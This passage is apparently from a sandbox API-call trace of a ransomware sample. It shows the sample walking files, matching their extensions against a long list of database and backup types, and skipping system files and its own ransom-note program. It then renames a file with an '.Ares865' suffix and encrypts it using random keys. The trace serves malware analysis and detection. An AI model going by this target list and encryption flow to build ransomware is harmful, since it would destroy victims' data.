lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0063.631] lstrlenW (lpString="adb") returned 3 [0063.631] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0063.631] lstrlenW (lpString="ade") returned 3 [0063.631] lstrcmpiW (lpString1="jpg", lpString2="ade") returned 1 [0063.631] lstrlenW (lpString="adf") returned 3 [0063.631] lstrcmpiW (lpString1="jpg", lpString2="adf") returned 1 [0063.631] lstrlenW (lpString="adn") returned 3 [0063.631] lstrcmpiW (lpString1="jpg", lpString2="adn") returned 1 [0063.631] lstrlenW (lpString="adp") returned 3 [0063.631] lstrcmpiW (lpString1="jpg", lpString2="adp") returned 1 [0063.631] lstrlenW (lpString="alf") returned 3 [0063.631] lstrcmpiW (lpString1="jpg", lpString2="alf") returned 1 [0063.631] lstrlenW (lpString="ask") returned 3 [0063.631] lstrcmpiW (lpString1="jpg", lpString2="ask") returned 1 [0063.631] lstrlenW (lpString="btr") returned 3 [0063.631] lstrcmpiW (lpString1="jpg", lpString2="btr") returned 1 [0063.631] lstrlenW (lpString="cat") returned 3 [0063.631] lstrcmpiW (lpString1="jpg", lpString2="cat") returned 1 [0063.632] lstrlenW (lpString="cdb") returned 3 [0063.632] lstrcmpiW (lpString1="jpg", lpString2="cdb") returned 1 [0063.632] lstrlenW (lpString="ckp") returned 3 [0063.632] lstrcmpiW (lpString1="jpg", lpString2="ckp") returned 1 [0063.632] lstrlenW (lpString="cma") returned 3 [0063.632] lstrcmpiW (lpString1="jpg", lpString2="cma") returned 1 [0063.632] lstrlenW (lpString="cpd") returned 3 [0063.632] lstrcmpiW (lpString1="jpg", lpString2="cpd") returned 1 [0063.632] lstrlenW (lpString="dacpac") returned 6 [0063.632] lstrcmpiW (lpString1="es.jpg", lpString2="dacpac") returned 1 [0063.632] lstrlenW (lpString="dad") returned 3 [0063.632] lstrcmpiW (lpString1="jpg", lpString2="dad") returned 1 [0063.632] lstrlenW (lpString="dadiagrams") returned 10 [0063.632] lstrlenW (lpString="daschema") returned 8 [0063.632] lstrcmpiW (lpString1="oses.jpg", lpString2="daschema") returned 1 [0063.632] lstrlenW (lpString="db-journal") returned 10 [0063.632] lstrlenW (lpString="db-shm") returned 6 [0063.632] lstrcmpiW (lpString1="es.jpg", lpString2="db-shm") returned 1 [0063.632] lstrlenW (lpString="db-wal") returned 6 [0063.632] lstrcmpiW (lpString1="es.jpg", lpString2="db-wal") returned 1 [0063.632] lstrlenW (lpString="dbc") returned 3 [0063.632] lstrcmpiW (lpString1="jpg", lpString2="dbc") returned 1 [0063.632] lstrlenW (lpString="dbs") returned 3 [0063.632] lstrcmpiW (lpString1="jpg", lpString2="dbs") returned 1 [0063.632] lstrlenW (lpString="dbt") returned 3 [0063.632] lstrcmpiW (lpString1="jpg", lpString2="dbt") returned 1 [0063.632] lstrlenW (lpString="dbv") returned 3 [0063.632] lstrcmpiW (lpString1="jpg", lpString2="dbv") returned 1 [0063.632] lstrlenW (lpString="dbx") returned 3 [0063.632] lstrcmpiW (lpString1="jpg", lpString2="dbx") returned 1 [0063.632] lstrlenW (lpString="dcb") returned 3 [0063.632] lstrcmpiW (lpString1="jpg", lpString2="dcb") returned 1 [0063.632] lstrlenW (lpString="dct") returned 3 [0063.632] lstrcmpiW (lpString1="jpg", lpString2="dct") returned 1 [0063.632] lstrlenW (lpString="dcx") returned 3 [0063.632] lstrcmpiW (lpString1="jpg", lpString2="dcx") returned 1 [0063.632] lstrlenW (lpString="ddl") returned 3 [0063.633] lstrcmpiW (lpString1="jpg", lpString2="ddl") returned 1 [0063.633] lstrlenW (lpString="dlis") returned 4 [0063.633] lstrcmpiW (lpString1=".jpg", lpString2="dlis") returned -1 [0063.633] lstrlenW (lpString="dp1") returned 3 [0063.633] lstrcmpiW (lpString1="jpg", lpString2="dp1") returned 1 [0063.633] lstrlenW (lpString="dqy") returned 3 [0063.633] lstrcmpiW (lpString1="jpg", lpString2="dqy") returned 1 [0063.633] lstrlenW (lpString="dsk") returned 3 [0063.633] lstrcmpiW (lpString1="jpg", lpString2="dsk") returned 1 [0063.633] lstrlenW (lpString="dsn") returned 3 [0063.633] lstrcmpiW (lpString1="jpg", lpString2="dsn") returned 1 [0063.633] lstrlenW (lpString="dtsx") returned 4 [0063.633] lstrcmpiW (lpString1=".jpg", lpString2="dtsx") returned -1 [0063.633] lstrlenW (lpString="dxl") returned 3 [0063.633] lstrcmpiW (lpString1="jpg", lpString2="dxl") returned 1 [0063.633] lstrlenW (lpString="eco") returned 3 [0063.633] lstrcmpiW (lpString1="jpg", lpString2="eco") returned 1 [0063.633] lstrlenW (lpString="ecx") returned 3 [0063.633] lstrcmpiW (lpString1="jpg", lpString2="ecx") returned 1 [0063.633] lstrlenW (lpString="edb") returned 3 [0063.633] lstrcmpiW (lpString1="jpg", lpString2="edb") returned 1 [0063.633] lstrlenW (lpString="epim") returned 4 [0063.633] lstrcmpiW (lpString1=".jpg", lpString2="epim") returned -1 [0063.633] lstrlenW (lpString="fcd") returned 3 [0063.633] lstrcmpiW (lpString1="jpg", lpString2="fcd") returned 1 [0063.633] lstrlenW (lpString="fdb") returned 3 [0063.633] lstrcmpiW (lpString1="jpg", lpString2="fdb") returned 1 [0063.633] lstrlenW (lpString="fic") returned 3 [0063.633] lstrcmpiW (lpString1="jpg", lpString2="fic") returned 1 [0063.633] lstrlenW (lpString="flexolibrary") returned 12 [0063.633] lstrlenW (lpString="fm5") returned 3 [0063.633] lstrcmpiW (lpString1="jpg", lpString2="fm5") returned 1 [0063.633] lstrlenW (lpString="fmp") returned 3 [0063.633] lstrcmpiW (lpString1="jpg", lpString2="fmp") returned 1 [0063.633] lstrlenW (lpString="fmp12") returned 5 [0063.633] lstrcmpiW (lpString1="s.jpg", lpString2="fmp12") returned 1 [0063.633] lstrlenW (lpString="fmpsl") returned 5 [0063.634] lstrcmpiW (lpString1="s.jpg", lpString2="fmpsl") returned 1 [0063.634] lstrlenW (lpString="fol") returned 3 [0063.634] lstrcmpiW (lpString1="jpg", lpString2="fol") returned 1 [0063.634] lstrlenW (lpString="fp3") returned 3 [0063.634] lstrcmpiW (lpString1="jpg", lpString2="fp3") returned 1 [0063.634] lstrlenW (lpString="fp4") returned 3 [0063.634] lstrcmpiW (lpString1="jpg", lpString2="fp4") returned 1 [0063.634] lstrlenW (lpString="fp5") returned 3 [0063.634] lstrcmpiW (lpString1="jpg", lpString2="fp5") returned 1 [0063.634] lstrlenW (lpString="fp7") returned 3 [0063.634] lstrcmpiW (lpString1="jpg", lpString2="fp7") returned 1 [0063.634] lstrlenW (lpString="fpt") returned 3 [0063.634] lstrcmpiW (lpString1="jpg", lpString2="fpt") returned 1 [0063.634] lstrlenW (lpString="frm") returned 3 [0063.634] lstrcmpiW (lpString1="jpg", lpString2="frm") returned 1 [0063.634] lstrlenW (lpString="gdb") returned 3 [0063.634] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0063.634] lstrlenW (lpString="gdb") returned 3 [0063.634] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0063.634] lstrlenW (lpString="grdb") returned 4 [0063.634] lstrcmpiW (lpString1=".jpg", lpString2="grdb") returned -1 [0063.634] lstrlenW (lpString="gwi") returned 3 [0063.634] lstrcmpiW (lpString1="jpg", lpString2="gwi") returned 1 [0063.634] lstrlenW (lpString="hdb") returned 3 [0063.634] lstrcmpiW (lpString1="jpg", lpString2="hdb") returned 1 [0063.634] lstrlenW (lpString="his") returned 3 [0063.634] lstrcmpiW (lpString1="jpg", lpString2="his") returned 1 [0063.634] lstrlenW (lpString="ib") returned 2 [0063.634] lstrcmpiW (lpString1="pg", lpString2="ib") returned 1 [0063.634] lstrlenW (lpString="idb") returned 3 [0063.634] lstrcmpiW (lpString1="jpg", lpString2="idb") returned 1 [0063.634] lstrlenW (lpString="ihx") returned 3 [0063.634] lstrcmpiW (lpString1="jpg", lpString2="ihx") returned 1 [0063.634] lstrlenW (lpString="itdb") returned 4 [0063.634] lstrcmpiW (lpString1=".jpg", lpString2="itdb") returned -1 [0063.635] lstrlenW (lpString="itw") returned 3 [0063.635] lstrcmpiW (lpString1="jpg", lpString2="itw") returned 1 [0063.635] lstrlenW (lpString="jet") returned 3 [0063.635] lstrcmpiW (lpString1="jpg", lpString2="jet") returned 1 [0063.635] lstrlenW (lpString="jtx") returned 3 [0063.635] lstrcmpiW (lpString1="jpg", lpString2="jtx") returned -1 [0063.635] lstrlenW (lpString="kdb") returned 3 [0063.635] lstrcmpiW (lpString1="jpg", lpString2="kdb") returned -1 [0063.635] lstrlenW (lpString="kexi") returned 4 [0063.635] lstrcmpiW (lpString1=".jpg", lpString2="kexi") returned -1 [0063.635] lstrlenW (lpString="kexic") returned 5 [0063.635] lstrcmpiW (lpString1="s.jpg", lpString2="kexic") returned 1 [0063.635] lstrlenW (lpString="kexis") returned 5 [0063.635] lstrcmpiW (lpString1="s.jpg", lpString2="kexis") returned 1 [0063.635] lstrlenW (lpString="lgc") returned 3 [0063.635] lstrcmpiW (lpString1="jpg", lpString2="lgc") returned -1 [0063.635] lstrlenW (lpString="lwx") returned 3 [0063.635] lstrcmpiW (lpString1="jpg", lpString2="lwx") returned -1 [0063.635] lstrlenW (lpString="maf") returned 3 [0063.635] lstrcmpiW (lpString1="jpg", lpString2="maf") returned -1 [0063.635] lstrlenW (lpString="maq") returned 3 [0063.635] lstrcmpiW (lpString1="jpg", lpString2="maq") returned -1 [0063.635] lstrlenW (lpString="mar") returned 3 [0063.635] lstrcmpiW (lpString1="jpg", lpString2="mar") returned -1 [0063.635] lstrlenW (lpString="marshal") returned 7 [0063.635] lstrcmpiW (lpString1="ses.jpg", lpString2="marshal") returned 1 [0063.635] lstrlenW (lpString="mas") returned 3 [0063.635] lstrcmpiW (lpString1="jpg", lpString2="mas") returned -1 [0063.635] lstrlenW (lpString="mav") returned 3 [0063.635] lstrcmpiW (lpString1="jpg", lpString2="mav") returned -1 [0063.635] lstrlenW (lpString="maw") returned 3 [0063.635] lstrcmpiW (lpString1="jpg", lpString2="maw") returned -1 [0063.635] lstrlenW (lpString="mdbhtml") returned 7 [0063.635] lstrcmpiW (lpString1="ses.jpg", lpString2="mdbhtml") returned 1 [0063.635] lstrlenW (lpString="mdn") returned 3 [0063.635] lstrcmpiW (lpString1="jpg", lpString2="mdn") returned -1 [0063.635] lstrlenW (lpString="mdt") returned 3 [0063.636] lstrcmpiW (lpString1="jpg", lpString2="mdt") returned -1 [0063.636] lstrlenW (lpString="mfd") returned 3 [0063.636] lstrcmpiW (lpString1="jpg", lpString2="mfd") returned -1 [0063.636] lstrlenW (lpString="mpd") returned 3 [0063.636] lstrcmpiW (lpString1="jpg", lpString2="mpd") returned -1 [0063.636] lstrlenW (lpString="mrg") returned 3 [0063.636] lstrcmpiW (lpString1="jpg", lpString2="mrg") returned -1 [0063.636] lstrlenW (lpString="mud") returned 3 [0063.636] lstrcmpiW (lpString1="jpg", lpString2="mud") returned -1 [0063.636] lstrlenW (lpString="mwb") returned 3 [0063.636] lstrcmpiW (lpString1="jpg", lpString2="mwb") returned -1 [0063.636] lstrlenW (lpString="myd") returned 3 [0063.636] lstrcmpiW (lpString1="jpg", lpString2="myd") returned -1 [0063.636] lstrlenW (lpString="ndf") returned 3 [0063.636] lstrcmpiW (lpString1="jpg", lpString2="ndf") returned -1 [0063.636] lstrlenW (lpString="nnt") returned 3 [0063.636] lstrcmpiW (lpString1="jpg", lpString2="nnt") returned -1 [0063.636] lstrlenW (lpString="nrmlib") returned 6 [0063.636] lstrcmpiW (lpString1="es.jpg", lpString2="nrmlib") returned -1 [0063.636] lstrlenW (lpString="ns2") returned 3 [0063.636] lstrcmpiW (lpString1="jpg", lpString2="ns2") returned -1 [0063.636] lstrlenW (lpString="ns3") returned 3 [0063.636] lstrcmpiW (lpString1="jpg", lpString2="ns3") returned -1 [0063.636] lstrlenW (lpString="ns4") returned 3 [0063.636] lstrcmpiW (lpString1="jpg", lpString2="ns4") returned -1 [0063.636] lstrlenW (lpString="nsf") returned 3 [0063.636] lstrcmpiW (lpString1="jpg", lpString2="nsf") returned -1 [0063.636] lstrlenW (lpString="nv") returned 2 [0063.636] lstrcmpiW (lpString1="pg", lpString2="nv") returned 1 [0063.636] lstrlenW (lpString="nv2") returned 3 [0063.636] lstrcmpiW (lpString1="jpg", lpString2="nv2") returned -1 [0063.636] lstrlenW (lpString="nwdb") returned 4 [0063.636] lstrcmpiW (lpString1=".jpg", lpString2="nwdb") returned -1 [0063.636] lstrlenW (lpString="nyf") returned 3 [0063.636] lstrcmpiW (lpString1="jpg", lpString2="nyf") returned -1 [0063.636] lstrlenW (lpString="odb") returned 3 [0063.636] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0063.637] lstrlenW (lpString="odb") returned 3 [0063.637] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0063.637] lstrlenW (lpString="oqy") returned 3 [0063.637] lstrcmpiW (lpString1="jpg", lpString2="oqy") returned -1 [0063.637] lstrlenW (lpString="ora") returned 3 [0063.637] lstrcmpiW (lpString1="jpg", lpString2="ora") returned -1 [0063.637] lstrlenW (lpString="orx") returned 3 [0063.637] lstrcmpiW (lpString1="jpg", lpString2="orx") returned -1 [0063.637] lstrlenW (lpString="owc") returned 3 [0063.637] lstrcmpiW (lpString1="jpg", lpString2="owc") returned -1 [0063.637] lstrlenW (lpString="p96") returned 3 [0063.637] lstrcmpiW (lpString1="jpg", lpString2="p96") returned -1 [0063.637] lstrlenW (lpString="p97") returned 3 [0063.637] lstrcmpiW (lpString1="jpg", lpString2="p97") returned -1 [0063.637] lstrlenW (lpString="pan") returned 3 [0063.637] lstrcmpiW (lpString1="jpg", lpString2="pan") returned -1 [0063.637] lstrlenW (lpString="pdb") returned 3 [0063.637] lstrcmpiW (lpString1="jpg", lpString2="pdb") returned -1 [0063.637] lstrlenW (lpString="pdm") returned 3 [0063.637] lstrcmpiW (lpString1="jpg", lpString2="pdm") returned -1 [0063.637] lstrlenW (lpString="pnz") returned 3 [0063.637] lstrcmpiW (lpString1="jpg", lpString2="pnz") returned -1 [0063.637] lstrlenW (lpString="qry") returned 3 [0063.637] lstrcmpiW (lpString1="jpg", lpString2="qry") returned -1 [0063.637] lstrlenW (lpString="qvd") returned 3 [0063.637] lstrcmpiW (lpString1="jpg", lpString2="qvd") returned -1 [0063.637] lstrlenW (lpString="rbf") returned 3 [0063.637] lstrcmpiW (lpString1="jpg", lpString2="rbf") returned -1 [0063.637] lstrlenW (lpString="rctd") returned 4 [0063.637] lstrcmpiW (lpString1=".jpg", lpString2="rctd") returned -1 [0063.637] lstrlenW (lpString="rod") returned 3 [0063.637] lstrcmpiW (lpString1="jpg", lpString2="rod") returned -1 [0063.637] lstrlenW (lpString="rodx") returned 4 [0063.637] lstrcmpiW (lpString1=".jpg", lpString2="rodx") returned -1 [0063.637] lstrlenW (lpString="rpd") returned 3 [0063.637] lstrcmpiW (lpString1="jpg", lpString2="rpd") returned -1 [0063.637] lstrlenW (lpString="rsd") returned 3 [0063.638] lstrcmpiW (lpString1="jpg", lpString2="rsd") returned -1 [0063.638] lstrlenW (lpString="sas7bdat") returned 8 [0063.638] lstrcmpiW (lpString1="oses.jpg", lpString2="sas7bdat") returned -1 [0063.638] lstrlenW (lpString="sbf") returned 3 [0063.638] lstrcmpiW (lpString1="jpg", lpString2="sbf") returned -1 [0063.638] lstrlenW (lpString="scx") returned 3 [0063.638] lstrcmpiW (lpString1="jpg", lpString2="scx") returned -1 [0063.638] lstrlenW (lpString="sdb") returned 3 [0063.638] lstrcmpiW (lpString1="jpg", lpString2="sdb") returned -1 [0063.638] lstrlenW (lpString="sdc") returned 3 [0063.638] lstrcmpiW (lpString1="jpg", lpString2="sdc") returned -1 [0063.638] lstrlenW (lpString="sdf") returned 3 [0063.638] lstrcmpiW (lpString1="jpg", lpString2="sdf") returned -1 [0063.638] lstrlenW (lpString="sis") returned 3 [0063.638] lstrcmpiW (lpString1="jpg", lpString2="sis") returned -1 [0063.638] lstrlenW (lpString="spq") returned 3 [0063.638] lstrcmpiW (lpString1="jpg", lpString2="spq") returned -1 [0063.638] lstrlenW (lpString="te") returned 2 [0063.638] lstrcmpiW (lpString1="pg", lpString2="te") returned -1 [0063.638] lstrlenW (lpString="teacher") returned 7 [0063.638] lstrcmpiW (lpString1="ses.jpg", lpString2="teacher") returned -1 [0063.638] lstrlenW (lpString="tmd") returned 3 [0063.638] lstrcmpiW (lpString1="jpg", lpString2="tmd") returned -1 [0063.638] lstrlenW (lpString="tps") returned 3 [0063.638] lstrcmpiW (lpString1="jpg", lpString2="tps") returned -1 [0063.638] lstrlenW (lpString="trc") returned 3 [0063.638] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0063.638] lstrlenW (lpString="trc") returned 3 [0063.638] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0063.638] lstrlenW (lpString="trm") returned 3 [0063.638] lstrcmpiW (lpString1="jpg", lpString2="trm") returned -1 [0063.638] lstrlenW (lpString="udb") returned 3 [0063.638] lstrcmpiW (lpString1="jpg", lpString2="udb") returned -1 [0063.638] lstrlenW (lpString="udl") returned 3 [0063.638] lstrcmpiW (lpString1="jpg", lpString2="udl") returned -1 [0063.638] lstrlenW (lpString="usr") returned 3 [0063.638] lstrcmpiW (lpString1="jpg", lpString2="usr") returned -1 [0063.639] lstrlenW (lpString="v12") returned 3 [0063.639] lstrcmpiW (lpString1="jpg", lpString2="v12") returned -1 [0063.639] lstrlenW (lpString="vis") returned 3 [0063.639] lstrcmpiW (lpString1="jpg", lpString2="vis") returned -1 [0063.639] lstrlenW (lpString="vpd") returned 3 [0063.639] lstrcmpiW (lpString1="jpg", lpString2="vpd") returned -1 [0063.639] lstrlenW (lpString="vvv") returned 3 [0063.639] lstrcmpiW (lpString1="jpg", lpString2="vvv") returned -1 [0063.639] lstrlenW (lpString="wdb") returned 3 [0063.639] lstrcmpiW (lpString1="jpg", lpString2="wdb") returned -1 [0063.639] lstrlenW (lpString="wmdb") returned 4 [0063.639] lstrcmpiW (lpString1=".jpg", lpString2="wmdb") returned -1 [0063.639] lstrlenW (lpString="wrk") returned 3 [0063.639] lstrcmpiW (lpString1="jpg", lpString2="wrk") returned -1 [0063.639] lstrlenW (lpString="xdb") returned 3 [0063.639] lstrcmpiW (lpString1="jpg", lpString2="xdb") returned -1 [0063.639] lstrlenW (lpString="xld") returned 3 [0063.639] lstrcmpiW (lpString1="jpg", lpString2="xld") returned -1 [0063.639] lstrlenW (lpString="xmlff") returned 5 [0063.639] lstrcmpiW (lpString1="s.jpg", lpString2="xmlff") returned -1 [0063.639] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.Ares865") returned 88 [0063.639] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\roses.jpg"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\roses.jpg.ares865"), dwFlags=0x1) returned 1 [0063.640] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\roses.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0063.640] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1920) returned 1 [0063.640] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0063.640] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0063.640] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0063.640] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0063.641] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0063.641] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.641] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa80, lpName=0x0) returned 0x164 [0063.643] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa80) returned 0x190000 [0063.644] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0063.645] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0063.645] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.645] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0063.645] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0063.645] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0063.645] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0063.645] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0063.645] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0063.645] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0063.646] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0063.646] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0063.646] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0063.646] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0063.646] CloseHandle (hObject=0x164) returned 1 [0063.646] CloseHandle (hObject=0x154) returned 1 [0063.646] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0063.646] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0063.646] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0063.646] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64c3520, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x64c3520, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xce17c0b0, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Shades of Blue.htm", cAlternateFileName="SHADES~1.HTM")) returned 1 [0063.646] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0063.646] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="aoldtz.exe") returned 1 [0063.646] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2=".") returned 1 [0063.646] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="..") returned 1 [0063.646] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="windows") returned -1 [0063.646] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="bootmgr") returned 1 [0063.646] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="temp") returned -1 [0063.646] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="pagefile.sys") returned 1 [0063.646] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="boot") returned 1 [0063.646] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="ids.txt") returned 1 [0063.646] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="ntuser.dat") returned 1 [0063.646] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="perflogs") returned 1 [0063.647] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="MSBuild") returned 1 [0063.647] lstrlenW (lpString="Shades of Blue.htm") returned 18 [0063.647] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg") returned 80 [0063.647] lstrcpyW (in: lpString1=0x2cce48e, lpString2="Shades of Blue.htm" | out: lpString1="Shades of Blue.htm") returned="Shades of Blue.htm" [0063.647] lstrlenW (lpString="Shades of Blue.htm") returned 18 [0063.647] lstrlenW (lpString="Ares865") returned 7 [0063.647] lstrcmpiW (lpString1="lue.htm", lpString2="Ares865") returned 1 [0063.647] lstrlenW (lpString=".dll") returned 4 [0063.647] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2=".dll") returned 1 [0063.647] lstrlenW (lpString=".lnk") returned 4 [0063.647] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2=".lnk") returned 1 [0063.647] lstrlenW (lpString=".ini") returned 4 [0063.647] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2=".ini") returned 1 [0063.647] lstrlenW (lpString=".sys") returned 4 [0063.647] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2=".sys") returned 1 [0063.647] lstrlenW (lpString="Shades of Blue.htm") returned 18 [0063.647] lstrlenW (lpString="bak") returned 3 [0063.647] lstrcmpiW (lpString1="htm", lpString2="bak") returned 1 [0063.647] lstrlenW (lpString="ba_") returned 3 [0063.647] lstrcmpiW (lpString1="htm", lpString2="ba_") returned 1 [0063.647] lstrlenW (lpString="dbb") returned 3 [0063.647] lstrcmpiW (lpString1="htm", lpString2="dbb") returned 1 [0063.647] lstrlenW (lpString="vmdk") returned 4 [0063.647] lstrcmpiW (lpString1=".htm", lpString2="vmdk") returned -1 [0063.647] lstrlenW (lpString="rar") returned 3 [0063.647] lstrcmpiW (lpString1="htm", lpString2="rar") returned -1 [0063.647] lstrlenW (lpString="zip") returned 3 [0063.647] lstrcmpiW (lpString1="htm", lpString2="zip") returned -1 [0063.647] lstrlenW (lpString="tgz") returned 3 [0063.647] lstrcmpiW (lpString1="htm", lpString2="tgz") returned -1 [0063.647] lstrlenW (lpString="vbox") returned 4 [0063.647] lstrcmpiW (lpString1=".htm", lpString2="vbox") returned -1 [0063.647] lstrlenW (lpString="vdi") returned 3 [0063.647] lstrcmpiW (lpString1="htm", lpString2="vdi") returned -1 [0063.647] lstrlenW (lpString="vhd") returned 3 [0063.647] lstrcmpiW (lpString1="htm", lpString2="vhd") returned -1 [0063.647] lstrlenW (lpString="vhdx") returned 4 [0063.648] lstrcmpiW (lpString1=".htm", lpString2="vhdx") returned -1 [0063.648] lstrlenW (lpString="avhd") returned 4 [0063.648] lstrcmpiW (lpString1=".htm", lpString2="avhd") returned -1 [0063.648] lstrlenW (lpString="db") returned 2 [0063.648] lstrcmpiW (lpString1="tm", lpString2="db") returned 1 [0063.648] lstrlenW (lpString="db2") returned 3 [0063.648] lstrcmpiW (lpString1="htm", lpString2="db2") returned 1 [0063.648] lstrlenW (lpString="db3") returned 3 [0063.648] lstrcmpiW (lpString1="htm", lpString2="db3") returned 1 [0063.648] lstrlenW (lpString="dbf") returned 3 [0063.648] lstrcmpiW (lpString1="htm", lpString2="dbf") returned 1 [0063.648] lstrlenW (lpString="mdf") returned 3 [0063.648] lstrcmpiW (lpString1="htm", lpString2="mdf") returned -1 [0063.648] lstrlenW (lpString="mdb") returned 3 [0063.648] lstrcmpiW (lpString1="htm", lpString2="mdb") returned -1 [0063.648] lstrlenW (lpString="sql") returned 3 [0063.648] lstrcmpiW (lpString1="htm", lpString2="sql") returned -1 [0063.648] lstrlenW (lpString="sqlite") returned 6 [0063.648] lstrcmpiW (lpString1="ue.htm", lpString2="sqlite") returned 1 [0063.648] lstrlenW (lpString="sqlite3") returned 7 [0063.648] lstrcmpiW (lpString1="lue.htm", lpString2="sqlite3") returned -1 [0063.648] lstrlenW (lpString="sqlitedb") returned 8 [0063.648] lstrcmpiW (lpString1="Blue.htm", lpString2="sqlitedb") returned -1 [0063.648] lstrlenW (lpString="xml") returned 3 [0063.648] lstrcmpiW (lpString1="htm", lpString2="xml") returned -1 [0063.648] lstrlenW (lpString="$er") returned 3 [0063.648] lstrcmpiW (lpString1="htm", lpString2="$er") returned 1 [0063.648] lstrlenW (lpString="4dd") returned 3 [0063.648] lstrcmpiW (lpString1="htm", lpString2="4dd") returned 1 [0063.648] lstrlenW (lpString="4dl") returned 3 [0063.648] lstrcmpiW (lpString1="htm", lpString2="4dl") returned 1 [0063.648] lstrlenW (lpString="^^^") returned 3 